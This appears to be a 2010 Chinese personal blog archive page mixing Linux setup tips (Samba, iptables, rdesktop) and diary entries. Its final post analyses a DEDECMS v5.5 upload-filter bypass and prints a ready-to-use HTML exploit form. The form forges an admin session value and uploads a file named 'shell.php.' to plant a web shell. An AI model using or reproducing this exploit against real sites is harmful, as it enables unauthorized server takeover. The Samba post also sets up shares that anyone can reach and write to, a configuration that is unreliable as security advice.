RSS

Archive for March, 2010:

Ubuntu下远程桌面无法开启Caps Lock问题

0 Comments | This entry was posted on Mar 30 2010

Ubuntu下远程链接虑拟机,出现打开Caps Lock但无法输入大写字母的问题,而用Shift+Letter可以输入大小写。

网上查到的解决方法如下

sudo gedit /usr/share/rdesktop/keymaps/common

然后找到最后的Caps_Lock行,用‘#’注释掉该行,保存退出即可。

, , ,
学·武功秘籍

失望

0 Comments | This entry was posted on Mar 24 2010

去了少林寺和龙门石窟,有点失望。。。
首先我不是一个愤青。也不反对日本的东西,但到龙门的白园后,里面题的字虽然写的大多是中国字,但题字的人却是日本人,让人有点郁闷。。。
不知道白居易在天有灵的话会不会气的跳起来。。。


忆·生活点滴

更换空间

0 Comments | This entry was posted on Mar 24 2010

更换空间了,在此谢谢KINDLE。。。
偶的空间到期了,一直在考虑是否要关掉,一年了,是否要关掉网上的BLOG,搞个本地的记录信息的程序。。。人太懒,电脑上的东西太乱,想到哪写到哪,没有好好整理过。。。。
先换到KINDLE的空间。。


忆·生活点滴

Ubuntu下Samba服务器

0 Comments | This entry was posted on Mar 16 2010

Samba软件包的安装
在Ubuntu的终端中输入一下命令:
sudo apt-get install samba
sudo apt-get install smbclient

Samba服务器的常用命令
开启Samba服务
sudo /etc/init.d/samba start
关闭Samba服务
sudo /etc/init.d/samba stop
重启Samba服务
sudo /etc/init.d/samba restart

嘿嘿,由于st0p只是架设起来方便虚拟机访问我的物理硬盘的数据。所以只是简单的添加了任何人都可以访问并可写的共享。

sudo gedit /etc/samba/smb.conf

修改
# security = user

security = share

以下内容加入未尾

[D]
path=/media/sda5
public=yes
writable=yes

[E]
path=/media/sda6
public=yes
writable=yes

[F]
path=/media/sda7
public=yes
writable=yes

[G]
path=/media/sda8
public=yes
writable=yes

[D]为共享名字
path后面的是共享路径

保存一下,然后我们输入sudo /etc/init.d/samba restart
然后我们在虚拟机中就可以通过\\IP访问了

, ,
学·武功秘籍

CentOS 防火墙配置 80端口

0 Comments | This entry was posted on Mar 13 2010

在虚拟机的CENTOS装好APACHE不能用,郁闷,解决方法如下

/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT

然后保存:
/etc/rc.d/init.d/iptables save

这样重启计算机后,防火墙默认已经开放了80和22端口

这里应该也可以不重启计算机:
/etc/init.d/iptables restart

防火墙的关闭,关闭其服务即可:

查看防火墙信息:
/etc/init.d/iptables status

关闭防火墙服务:
/etc/init.d/iptables stop

永久关闭?不知道怎么个永久法:
chkconfig –level 35 iptables off

, ,
学·武功秘籍

运气很不好

0 Comments | This entry was posted on Mar 12 2010

唉,最近右眼又开始跳了,每次这个时候一定没什么好事发生吧...

前两天家里租出去的老房子外面的两个电表被别人砸坏了,打了110,好似没啥效果...小失望一下...

手上碰了碰了两三处小伤口,因为一些事和老婆吵了一架,还有N多郁闷的事情..

今天我亲爱的老奶奶也去世了,希望她能够安息,在天国过的一切都好!

本来是打了很多字的,后来想想还是删掉吧,写的太乱了....

人这一辈子活着,生不带来,死不带去.开心也是过,伤心也是过,我是不是活的太累了,是不是该改变一下了?


忆·生活点滴

DEDECMS v5.5 Final select_soft_post.php 漏洞

2 Comments | This entry was posted on Mar 09 2010

作者:st0p
转载请注明出处 http://www.st0p.org

今天才从Wolves Security Team看到toby57大牛发布的"DEDECMS v5.5 GBK Final 的一个鸡肋漏洞"这篇文章,原文地址:http://bbs.wolvez.org/topic/125/

自己本地测试了一下,覆盖SESSION这个有点鸡胁才是真的,因为要求session.auto_start = 1的情况下,一般session.auto_start这个是关闭的,所以很鸡胁.不过后面的拿SHELL当你成功进入后台的情况下就能用了..

而且session.auto_start一般是要和session_start()一起用的.查了一下资料,只有在session.auto_start开启的情况下,先调用session_start(),然后才有可能.不过具体杂覆盖的SESSION我还没去看,唉,要真找下去头非晕不可...有空在看吧..

我看了一下,其实GBK和UTF8都存在这个问题,不知道发现这个的大牛为啥只是把标题写了GBK...

看了一下/include/dialog/select_soft_post.php

问题主要出现在手工指定文件名后,更名的部分.当我们的名字为st0p.php.的时候,注意,php后还有个点,就可以跳过验证,看代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

......
//文件名(前为手工指定, 后者自动处理)
if(!empty($newname))
{
	$filename = $newname; //当我们的新名称为st0p.php.的时候
	if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); //当$filename中不含有.的时候调用
	else $fs = explode('.', $filename); //当$filename中含有.时调用
	if(eregi($cfg_not_allowall, $fs[count($fs)-1])) //$fs[count($fs)-1]得到的值为空,跳过验证
	{
		ShowMsg("你指定的文件名被系统禁止!",'javascript:;');
		exit();
	}
	if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1];
}
else
{
	$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme));
	$fs = explode('.', $uploadfile_name);
	if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
	{
		ShowMsg("你上传了某些可能存在不安全因素的文件,系统拒绝操作!",'javascript:;');
		exit();
	}
	$filename = $filename.'.'.$fs[count($fs)-1];
}
$fullfilename = $cfg_basedir.$activepath.'/'.$filename; //嘿嘿,跳过验证,$filename还为st0p.php.
$fullfileurl = $activepath.'/'.$filename;
move_uploaded_file($uploadfile,$fullfilename) or die("上传文件到 $fullfilename 失败!");
@unlink($uploadfile);
......

EXP如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DEDECMS v5.5 Final select_soft_post.php EXP</title>
<script type="text/javascript">
function fsubmit(){
    var form = document.forms[0];
    form.action = form.target.value + form.path.value;
    tmpstr = form.target.value +'/'+ form.newname.value;
    form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
    form.submit();
    }
</script>
<style type="text/css">
<!--
body {
	text-align: center;
}
-->
</style>
</head>
 
<body>
<h3>DEDECMS v5.5 Final select_soft_post.php EXP</h3>
<form action="" method="post" enctype="multipart/form-data">
  <p>
    <input type="hidden" name="_SESSION[dede_admin_id]" value="1" />
    <input type="hidden" name="bkurl" value="1" />
    <label>Target:
      <input name="target" type="text" id="target" value="http://target" />
    </label>
    <label>Path:
      <input name="path" type="text" id="path" value="/include/dialog/select_soft_post.php" />
    </label>
    <label>File:
      <input type="file" name="uploadfile" id="uploadfile" />
    </label>
    <label>NewName:
      <input name="newname" type="text" id="newname" value="shell.php." />
    </label>
    &nbsp;<input type="submit" name="button" id="button" value="Fuck" onclick="fsubmit()" />
  </p>
</form>
</body>
</html>
, , ,
学·武功秘籍